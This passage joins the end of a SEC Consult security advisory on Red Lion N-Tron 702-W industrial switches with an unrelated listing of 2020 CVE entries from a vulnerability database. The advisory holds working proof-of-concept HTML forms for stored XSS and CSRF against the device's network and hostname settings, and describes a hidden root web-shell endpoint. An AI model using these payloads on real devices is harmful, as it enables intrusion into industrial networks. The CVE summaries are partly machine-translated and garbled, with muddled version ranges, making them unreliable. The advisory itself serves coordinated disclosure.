Content-Disposition: form-data; name="dns2"
-----------------------------195698564115308644282115103021--
-------------------------------------------------------------------------------
This can also be embedded in the HTML code as shown below:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/network.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="netmode" value="bridge" />
<input type="hidden" name="wlanipmode" value="0" />
<input type="hidden" name="brip" value="192.168.1.202" />
<input type="hidden" name="brmask" value="255.255.255.0" />
<input type="hidden" name="brgw" value="192.168.1.1"><script>alert(document.location+" > SEC-Consult")</script>" />
<input type="hidden" name="dns1" value="" />
<input type="hidden" name="dns2" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF can be triggered on each endpoint as the whole web-interface does not
implement any protection mechanisms. Changing the hostname to "SEC Consult" can
be done with the following embedded HTML code:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/system.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="hostname" value="SEC Consult" />
<input type="hidden" name="action" value="chhost" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
4) Hidden OS Web-Shell Interface - CVE-2020-16204
The endpoint "/admin.cgi" is not referenced within the whole web-interface and
also not documented in the manual. By browsing this endpoint, multiple actions
can be natively triggered:
* Execute commands in context of the root user
* Upload files
* Download files
* Change access rights
All other actions can be done via the command execution. The lack of CSRF
protections allows attackers to execute commands on the device by luring a
user on malicious web-pages.
5) Known BusyBox Vulnerabilities
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
55\;test.txt
#
-------------------------------------------------------------------------------
6) Outdated Software Components
By analyzing the firmware a lot of components are found to be outdated:
* BusyBox 1.0.1
* PHP/FI 2.0.1
* Dnsmasq 2.35
* Boa 0.93.15
Vulnerable / tested versions:
-----------------------------
the following firmware version has been tested:
* Red Lion N-Tron 702-W / 2.0.26
* Red Lion N-Tron 702M12-W / 2.0.26
Vendor contact timeline:
------------------------
2020-03-09: Contacting vendor through support.emea@redlion.net; No answer.
2020-03-17: Asked for status update; No answer.
2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to
the list of recipients; No answer.
2020-04-13: Requested support for coordination from CERT@VDE for the advisory.
Sent the advisory to the CERT.
2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in-
formed.
2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that
they are waiting for an update of Red Lion.
2020-08-20: Received CISA draft for an advisory from CERT@VDE.
2020-08-28: Found the published advisory on CISA's website* which was released
on 2020-08-27.
2020-09-02: Release of security advisory.
* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01
Solution:
---------
Upgrade to newer hardware.
Workaround:
-----------
None.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2020
VAR-202010-1229 | CVE-2020-9908 | macOS Out-of-bounds read vulnerability |
CVSS V2: 6.6 CVSS V3: 7.1 Severity: HIGH |
An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory. This vulnerability allows local attackers to disclose sensitive information on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the AppleIntelKBLGraphics kext. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the kernel. Apple macOS Catalina is a set of dedicated operating systems developed by Apple for Mac computers
VAR-202008-1056 | CVE-2020-5383 | Dell EMC Isilon OneFS and Dell EMC PowerScale OneFS Buffer error vulnerability in |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
Dell EMC Isilon OneFS version 8.2.2 and Dell EMC PowerScale OneFS version 9.0.0 contains a buffer overflow vulnerability in the Likewise component. A remote unauthenticated malicious attacker may potentially exploit this vulnerability to cause a process restart
VAR-202008-0937 | CVE-2020-5921 | plural BIG-IP Product exhaustion vulnerabilities |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
in BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.6, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.2, Syn flood causes large number of MCPD context messages destined to secondary blades consuming memory leading to MCPD failure. This issue affects only VIPRION hosts with two or more blades installed. Single-blade VIPRION hosts are not affected. plural BIG-IP The product contains a resource exhaustion vulnerability.Service operation interruption (DoS) It may be put into a state. BIG-IP version 15.1.0 to 15.1.0.4, version 15.0.0 to 15.0.1.3, version 14.1.0 to 14.1.2.3, version 13.1.0 to 13.1.3.3, 12.1.0 Versions up to 12.1.5.1 and versions between 11.6.1 and 11.6.5.1 have a security vulnerability
VAR-202008-0945 | CVE-2020-5912 | plural BIG-IP Product input verification vulnerabilities |
CVSS V2: 3.6 CVSS V3: 7.1 Severity: HIGH |
In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the restjavad process's dump command does not follow current best coding practices and may overwrite arbitrary files. plural BIG-IP The product contains an input verification vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be put into a state. BIG-IP version 15.1.0 to 15.1.0.4, version 15.0.0 to 15.0.1.3, version 14.1.0 to 14.1.2.3, version 13.1.0 to 13.1.3.3, 12.1.0 There is a security vulnerability in versions between 12.1.5.1 and 11.6.1 to 11.6.5.1
VAR-202008-0946 | CVE-2020-5915 | plural BIG-IP Cross-site scripting vulnerabilities in products |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, an undisclosed TMUI page contains a vulnerability which allows a stored XSS when BIG-IP systems are setup in a device trust. plural BIG-IP The product contains a cross-site scripting vulnerability.Information may be obtained and tampered with. BIG-IP version 15.1.0 to 15.1.0.4, version 15.0.0 to 15.0.1.3, version 14.1.0 to 14.1.2.3, version 13.1.0 to 13.1.3.3, 12.1.0 There is an XSS vulnerability in versions between 12.1.5.1 and 11.6.1-11.6.5.1, which is caused by the lack of correct validation of client data in WEB applications in BIG-IP. An attacker could exploit this vulnerability to execute client code
VAR-202008-0934 | CVE-2020-5918 | plural BIG-IP Resource depletion vulnerability in the product |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management Microkernel (TMM) may stop responding when processing Stream Control Transmission Protocol (SCTP) traffic when traffic volume is high. This vulnerability affects TMM by way of a virtual server configured with an SCTP profile. plural BIG-IP The product contains a resource depletion vulnerability.Denial of service (DoS) It may be put into a state. F5 BIG-IP is an application delivery platform integrated with network traffic management, application security management, load balancing and other functions of the US company F5. F5 BIG-IP version between 15.1.0 and 15.1.0.4, version between 15.0.0 and 15.0.1.3, version between 14.1.0 and 14.1.2.3, version between 13.1.0 and 13.1.3.3, version 12.1. Attackers can exploit this vulnerability to cause damage to TMM
VAR-202008-1265 | CVE-2020-9086 | Huawei of HUAWEI 4G Router B612 Out-of-bounds write vulnerability in firmware |
CVSS V2: 5.0 CVSS V3: 4.3 Severity: MEDIUM |
There is a buffer error vulnerability in some Huawei product. An unauthenticated attacker may send special UPNP message to the affected products. Due to insufficient input validation of some value, successful exploit may cause some service abnormal. (Vulnerability ID: HWPSIRT-2017-08234)
This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9086. Huawei of HUAWEI 4G Router B612 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. Huawei 4G Router B612 is an LTE router product of China's Huawei (Huawei) company. The product can use 4G network as a shared hotspot.
Huawei 4G Router B612 has security vulnerabilities. The vulnerability stems from the program not validating the input correctly
VAR-202008-1260 | CVE-2020-9085 | Huawei of HUAWEI 4G Router B612 in the firmware NULL Pointer dereference vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
There is a NULL pointer dereference vulnerability in some Huawei products. An attacker may send specially crafted POST messages to the affected products. Due to insufficient validation of some parameter in the message, successful exploit may cause some process abnormal. (Vulnerability ID: HWPSIRT-2017-10105)
This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9085. Huawei of HUAWEI 4G Router B612 The firmware has NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state. Huawei 4G Router B612 is a 4G router device.
Huawei 4G Router B612 has a null pointer reference vulnerability in processing message parameters, allowing remote attackers to use the vulnerability to submit special requests, which can crash the application and cause a denial of service attack
VAR-202008-0673 | CVE-2020-15499 | ASUS RT-AC1900P routers cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
An issue was discovered on ASUS RT-AC1900P routers before 3.0.0.4.385_20253. They allow XSS via spoofed Release Notes on the Firmware Upgrade page. ASUS RT-AC1900P A cross-site scripting vulnerability exists in the router.Information may be obtained and tampered with. Remote attackers can use the vulnerability to inject malicious scripts or HTML code. When malicious data is viewed, they can obtain sensitive information or hijack user sessions
VAR-202008-0794 | CVE-2020-3394 | NX-OS Vulnerability regarding lack of authentication in |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in the Enable Secret feature of Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an authenticated, local attacker to issue the enable command and get full administrative privileges. To exploit this vulnerability, the attacker would need to have valid credentials for the affected device. The vulnerability is due to a logic error in the implementation of the enable command. An attacker could exploit this vulnerability by logging in to the device and issuing the enable command. A successful exploit could allow the attacker to gain full administrative privileges without using the enable password. Note: The Enable Secret feature is disabled by default. NX-OS Exists in a vulnerability related to lack of authentication.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco Nexus 3000 is a set of Cisco switch equipment
VAR-202008-0095 | CVE-2020-12456 | Mitel MiVoice Connect Client Past Traversal Vulnerability in |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A remote code execution vulnerability in Mitel MiVoice Connect Client before 214.100.1223.0 could allow an attacker to execute arbitrary code in the chat notification window, due to improper rendering of chat messages. A successful exploit could allow an attacker to steal session cookies, perform directory traversal, and execute arbitrary scripts in the context of the Connect client. Mitel MiVoice Connect Client Exists in a past traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state
VAR-202008-0943 | CVE-2020-5927 | BIG-IP ASM Cross-site scripting vulnerability in |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
In versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, and 14.1.0-14.1.2.6, BIG-IP ASM Configuration utility Stored-Cross Site Scripting. F5 BIG-IP AFM is an advanced firewall device.
The F5 BIG-IP AFM configuration tool has a cross-site scripting vulnerability. Remote attackers can use this vulnerability to inject malicious scripts or HTML code. When malicious data is viewed, they can obtain sensitive information or hijack user sessions. BIG-IP versions between 15.1.0 and 15.1.0.4, versions between 15.0.0 and 15.0.1.3, and versions between 14.1.0 and 14.1.2.26 have XSS vulnerabilities. Correct validation of terminal data. An attacker could exploit this vulnerability to execute client code
VAR-202008-0672 | CVE-2020-15498 | ASUS RT-AC1900P Certificate validation vulnerabilities in routers |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
An issue was discovered on ASUS RT-AC1900P routers before 3.0.0.4.385_20253. The router accepts an arbitrary server certificate for a firmware update. The culprit is the --no-check-certificate option passed to wget tool used to download firmware update files. ASUS RT-AC1900P A router contains a certificate validation vulnerability.Information may be tampered with.
ASUS RT-AC1900P routers firmware upgrade processing certificate has security loopholes, allowing remote attackers to use loopholes to submit special requests, upgrade malicious firmware, and control the server